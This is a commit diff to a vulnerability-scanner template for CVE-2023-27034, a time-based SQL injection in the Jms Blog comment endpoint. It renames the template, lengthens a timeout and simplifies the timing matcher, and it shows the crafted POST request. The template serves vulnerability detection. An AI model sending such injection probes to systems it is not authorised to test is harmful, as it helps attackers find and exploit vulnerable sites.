Update CVE-2023-27034.yaml

2024-09-26 09:20:16 +04:00 · 2024-09-26 09:20:16 +04:00 · bac2b4b08c
parent e7de2c2cd1
commit bac2b4b08c
1 changed files with 5 additions and 11 deletions
--- a/http/cves/2023/CVE-2023-27034.yaml
+++ b/http/cves/2023/CVE-2023-27034.yaml
@ -1,7 +1,7 @@
 id: CVE-2023-27034

 info:
-  name: Time Based SQL injection vulnerability in Jms Blog
+  name: Jms Blog - SQL Injection
  author: MaStErChO
  severity: critical
  description: |
@ -39,7 +39,6 @@ http:
        GET / HTTP/1.1
        Host: {{Hostname}}

-
    host-redirects: true
    max-redirects: 3
    matchers:
@ -52,13 +51,11 @@ http:

  - raw:
      - |
-        @timeout: 12s
+        @timeout: 20s
        POST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1
+        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
        X-Requested-With: XMLHttpRequest
-        Referer: {{RootURL}}
-        Host: {{Hostname}}
-        Connection: Keep-alive

        ------------YWJkMTQzNDcw
        Content-Disposition: form-data; name="comment"
@ -86,13 +83,10 @@ http:
        submitComment=
        ------------YWJkMTQzNDcw--

-    stop-at-first-match: true
    host-redirects: true
    max-redirects: 3
-    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
-          - 'duration_1>=6'
-        condition: and
-# digest: 4a0a00473045022100842f6d137227d9615048da5a7346e239d060859af380518f03f3b9afcc9d583102200f06aede5a783292f532ea71439283376b6140cade971197fc79d3dda174db61:922c64590222798bb761d5b6d8e72950
+          - 'duration>=6'
+# digest: 4a0a00473045022100842f6d137227d9615048da5a7346e239d060859af380518f03f3b9afcc9d583102200f06aede5a783292f532ea71439283376b6140cade971197fc79d3dda174db61:922c64590222798bb761d5b6d8e72950